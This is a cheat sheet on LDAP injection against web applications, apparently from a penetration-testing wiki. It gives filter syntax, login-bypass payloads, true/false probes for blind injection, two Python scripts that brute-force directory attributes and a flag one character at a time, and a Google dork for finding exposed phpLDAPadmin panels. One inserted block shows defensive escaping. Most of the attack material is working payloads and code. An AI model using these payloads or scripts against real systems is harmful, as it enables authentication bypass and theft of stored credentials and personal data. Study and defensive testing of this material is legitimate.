LDAP injection is an attack targeting web applications that construct LDAP statements from user input. It occurs when the application fails to properly sanitize that input, allowing attackers to manipulate the LDAP statements through a local proxy, which can lead to unauthorized access or data manipulation.
Filter = ( filtercomp )
Filtercomp = and / or / not / item
And = & filterlist
Or = | filterlist
Not = ! filter
Filterlist = 1*filter
Item = simple / present / substring
Simple = attr filtertype assertionvalue
Filtertype = '=' / '~=' / '>=' / '<='
Present = attr = *
Substring = attr "=" [initial] * [final]
Initial = assertionvalue
Final = assertionvalue
(&) = Absolute TRUE
(|) = Absolute FALSE
For example:
(&(!(objectClass=Impresoras))(uid=s*))(&(objectClass=user)(uid=*))
You can gain access to the database, and it may contain information of many different types.
OpenLDAP: if 2 filters arrive, it executes only the first one.
ADAM or Microsoft LDS: with 2 filters they throw an error.
SunOne Directory Server 5.0: it executes both filters.
It is very important to send the filter with correct syntax, or an error will be thrown. It is best to send only one filter.
The filter has to start with: & or |
Example: (&(directory=val1)(folder=public))
Then: (&(objectClass=*)(ObjectClass=*)) will be the first filter (the one that gets executed).
Login Bypass
LDAP supports several formats for storing the password: clear, md5, smd5, sh1, sha, crypt. So it may be that, regardless of what you put in the password field, it gets hashed.
user=*
password=*
--> (&(user=*)(password=*))
# The asterisks are great in LDAPi

user=admin)(&)
password=pwd
--> (&(user=admin)(&))(password=pwd) # Can throw an error

username=admin)(!(&(|
pass=any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) --> As (|) is FALSE, the user is admin and the password check is True.
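As an added mitigation example (not part of the original page), the fix for the bypasses above is to escape every user-supplied value per RFC 4515 before it is placed in the filter; the function names are my own, and the attribute names user/password are the ones used in the payloads above.

```python
# Added example: RFC 4515 escaping versus naive concatenation, applied to the
# login payloads shown above. Function names are hypothetical.


def escape_filter_value(value: str) -> str:
    """Escape a string for use as an LDAP filter assertion value (RFC 4515).

    The characters that carry filter syntax ( \\ * ( ) and NUL ) are replaced
    by a backslash plus two hex digits, so a value can never close or open a
    filter component or act as a wildcard.
    """
    out = []
    for ch in value:
        if ch in '\\*()' or ch == '\x00':
            out.append('\\%02x' % ord(ch))
        else:
            out.append(ch)
    return ''.join(out)


def unsafe_login_filter(user: str, password: str) -> str:
    # Vulnerable: input is concatenated straight into the filter, which is the
    # pattern every payload above relies on.
    return f"(&(user={user})(password={password}))"


def safe_login_filter(user: str, password: str) -> str:
    # Hardened: each value is escaped, so it is only ever matched literally.
    return (f"(&(user={escape_filter_value(user)})"
            f"(password={escape_filter_value(password)}))")


def filter_is_single_component(filt: str) -> bool:
    """Defensive check for the 'two filters arrive' case: True only if the
    string is exactly one balanced top-level filter. It does NOT catch
    wildcard injection or a balanced injected component; escaping does."""
    depth = 0
    for i, ch in enumerate(filt):
        if ch == '(':
            depth += 1
        elif ch == ')':
            depth -= 1
            if depth < 0 or (depth == 0 and i != len(filt) - 1):
                return False
    return depth == 0 and filt.startswith('(')
```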
You can force False or True responses to check whether any data is returned and confirm a possible Blind LDAP Injection:
# This will result in True, so some information will be shown
Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass=*)(objectClass=*))(&objectClass=void )(type=Pepi*))

# This will result in False, so no information will be returned or shown
Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass=void)(objectClass=void))(&objectClass=void )(type=Pepi*))
Data dump
You can iterate over the ASCII letters, digits and symbols:
LDAP objects have several attributes by default that could be used to store information. You can try to brute-force all of them to extract that information. You can find a list of default LDAP attributes here.
#!/usr/bin/python3

import requests
import string
from time import sleep
import sys

proxy = {"http": "localhost:8080"}
url = "http://10.10.10.10/login.php"
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]

for attribute in attributes:  # Extract all attributes
    value = ""
    finish = False
    while not finish:
        for char in alphabet:  # In each position test each possible printable char
            query = f"*)({attribute}={value}{char}*"
            data = {'login': query, 'password': 'bla'}
            r = requests.post(url, data=data, proxies=proxy)
            sys.stdout.write(f"\r{attribute}: {value}{char}")
            # sleep(0.5)  # Avoid brute-force bans
            if "Cannot login" in r.text:
                value += str(char)
                break
            if char == alphabet[-1]:  # If last of all the chars, then no more chars in the value
                finish = True
                print()
Special Blind LDAP Injection (without "*")
#!/usr/bin/python3

import requests, string

alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

flag = ""
for i in range(50):
    print("[i] Looking for number " + str(i))
    for char in alphabet:
        r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
        if ("TRUE CONDITION" in r.text):
            flag += char
            print("[+] Flag: " + flag)
            break
Google Dorks
intitle:"phpLDAPadmin"inurl:cmd.php
More Payloads